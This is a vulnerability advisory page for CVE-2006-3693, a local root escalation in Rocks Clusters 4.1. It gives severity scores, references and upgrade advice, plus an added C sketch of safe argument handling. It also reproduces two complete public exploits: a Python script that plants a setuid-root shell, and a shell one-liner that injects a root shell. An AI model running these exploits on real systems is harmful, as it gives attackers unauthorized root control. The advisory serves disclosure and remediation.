CVE-2006-3693
CVSS 4.6
Published: 2006-07-21 10:03:00
Last revised: 2011-03-07 21:39:14

[Original text] Rocks Clusters 4.1 and earlier allows local users to gain privileges via commands enclosed with escaped backticks (\`) in an argument to the (1) mount-loop (mount-loop.c) or (2) umount-loop (umount-loop.c) command, which is not filtered in a system function call.


[CNNVD] CNNVD data is not yet available.



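- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]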

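- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links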

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3693
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3693
(official data source) NVD

- Other links and resources

http://www.securityfocus.com/bid/19003
(PATCH)  BID  19003
http://secunia.com/advisories/21065
(VENDOR_ADVISORY)  SECUNIA  21065
http://xforce.iss.net/xforce/xfdb/27758
(UNKNOWN)  XF  rocks-mount-umount-privilege-escalation(27758)
http://xavier.tigerteam.se/exploits/rocksumountdirty.py
(UNKNOWN)  MISC  http://xavier.tigerteam.se/exploits/rocksumountdirty.py
http://xavier.tigerteam.se/exploits/rocksmountdirty.sh
(UNKNOWN)  MISC  http://xavier.tigerteam.se/exploits/rocksmountdirty.sh
http://xavier.tigerteam.se/advisories/TSEAD-200606-6.txt
(UNKNOWN)  MISC  http://xavier.tigerteam.se/advisories/TSEAD-200606-6.txt
http://www.vupen.com/english/advisories/2006/2833
(UNKNOWN)  VUPEN  ADV-2006-2833
http://www.securityfocus.com/archive/1/archive/1/440126/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060714 Rocks Clusters <=4.1 local root
http://securityreason.com/securityalert/1242
(UNKNOWN)  SREASON  1242

- Vulnerability information (2015)

Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit (EDBID:2015)
linux local
2006-07-15 Verified
0 Xavier de Leon
N/A [click to download]
#!/usr/bin/env python
##############################################################################
##  rocksumountdirty.py: Rocks release <=4.1 local root exploit
##  quick and nasty version of the exploit. make sure the . is writable and
##  you clean up afterwards. ;)
##
##  coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
##############################################################################
x=__import__('os');c=x.getcwd()
open('%s/x'%c, 'a').write("#!/bin/sh\ncp /bin/ksh %s/shell\nchmod a+xs %s/shell\nchown root.root %s/shell\n" % (c,c,c))
print "Rocks Clusters <=4.1 umount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]"
x.system('umount-loop "\`sh %s/x\`"'%c);x.system("%s/shell"%c)

# milw0rm.com [2006-07-15]
		

- Vulnerability information (2016)

Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit (EDBID:2016)
linux local
2006-07-15 Verified
0 Xavier de Leon
N/A [click to download]
#!/bin/sh
##############################################################################
##  rocksmountdirty.sh: Rocks release <=4.1 local root exploit
##  make sure 'mount-loop' is in your path for this to work.
##
##  coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
##############################################################################
echo "Rocks Clusters <=4.1 mount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]"
echo "getting root.. goodluck"
mount-loop "null" "null" "null; python -c 'import os;os.setuid(0);os.setgid(0);os.execl(\"/bin/sh\", \"/usr/sbin/httpd\")'"

# milw0rm.com [2006-07-15]
		

- Vulnerability information

27350
Rocks mount-loop Crafted Argument Local Privilege Escalation
Local Access Required Other
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability description

Rocks Clusters contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when 'umount-loop' fails to filter incoming arguments before setuid and system calls. This flaw may lead to a loss of Confidentiality and Integrity.
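
Added example, not taken from the Rocks source or from the advisory: a sketch of how a setuid helper of this kind can avoid the flaw described above, by checking the argument against an allowlist and invoking the program through execve() with an explicit argument vector instead of handing a string to system(). The function names arg_is_safe_path, run_without_shell and safe_umount and the /bin/umount path are assumptions made for illustration.

```c
/* Added example (hypothetical; not the Rocks mount-loop/umount-loop source). */
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allowlist: absolute path made only of [A-Za-z0-9._/-], no ".." component. */
int arg_is_safe_path(const char *s)
{
    static const char ok[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._/-";
    size_t n;
    if (s == NULL || s[0] != '/')
        return 0;
    n = strlen(s);
    if (n >= 4096 || strspn(s, ok) != n)  /* rejects ` $ ; | quotes, spaces */
        return 0;
    if (strstr(s, "/../") != NULL || (n >= 3 && strcmp(s + n - 3, "/..") == 0))
        return 0;
    return 1;
}

/* Run prog with an explicit argv and a fixed environment. No shell parses
 * the arguments. Returns the child's exit status, or -1 on error. */
int run_without_shell(const char *prog, char *const argv[])
{
    static char *const clean_env[] = { "PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL };
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(prog, argv, clean_env);
        _exit(127);                        /* only reached if execve failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Hypothetical wrapper: validate first, then call umount directly.
 * /bin/umount is an assumed path. Returns -2 if the argument is rejected. */
int safe_umount(const char *mountpoint)
{
    char *argv[] = { "umount", (char *)mountpoint, NULL };
    if (!arg_is_safe_path(mountpoint))
        return -2;
    return run_without_shell("/bin/umount", argv);
}
```

Because the argument reaches the child as a single argv element, backticks and semicolons in it are never interpreted; the allowlist is a second layer that refuses such input before any process is started.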

- Timeline

2006-07-05 2006-05-31
Unknown Unknown

- Solution

Upgrade to version 4.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

- Vulnerability information

Rocks Clusters Local Privilege Escalation Vulnerabilities
Input Validation Error 19003
No Yes
2006-07-17 12:00:00 2007-03-08 03:35:00
These vulnerabilities were discovered by Xavier de Leon.

- Affected program versions

Rocks Clusters Rocks Clusters 4.1
Rocks Clusters Rocks Clusters 4.0
Rocks Clusters Rocks Clusters 4.2

- Unaffected program versions

Rocks Clusters Rocks Clusters 4.2

- Vulnerability discussion

Rocks Clusters is prone to multiple local privilege-escalation vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.

These issues allow local attackers to gain superuser privileges, facilitating the complete compromise of affected computers.

Rocks Clusters versions 4.1 and prior are vulnerable to these issues.

- Exploitation

Attackers can exploit these issues using a Linux command shell.

Sample exploit code has been provided:

- Solution

These issues have been addressed with the 4.2 release; please see the reference section for details.


Rocks Clusters Rocks Clusters 4.1

Rocks Clusters Rocks Clusters 4.0

- Related references

 

 
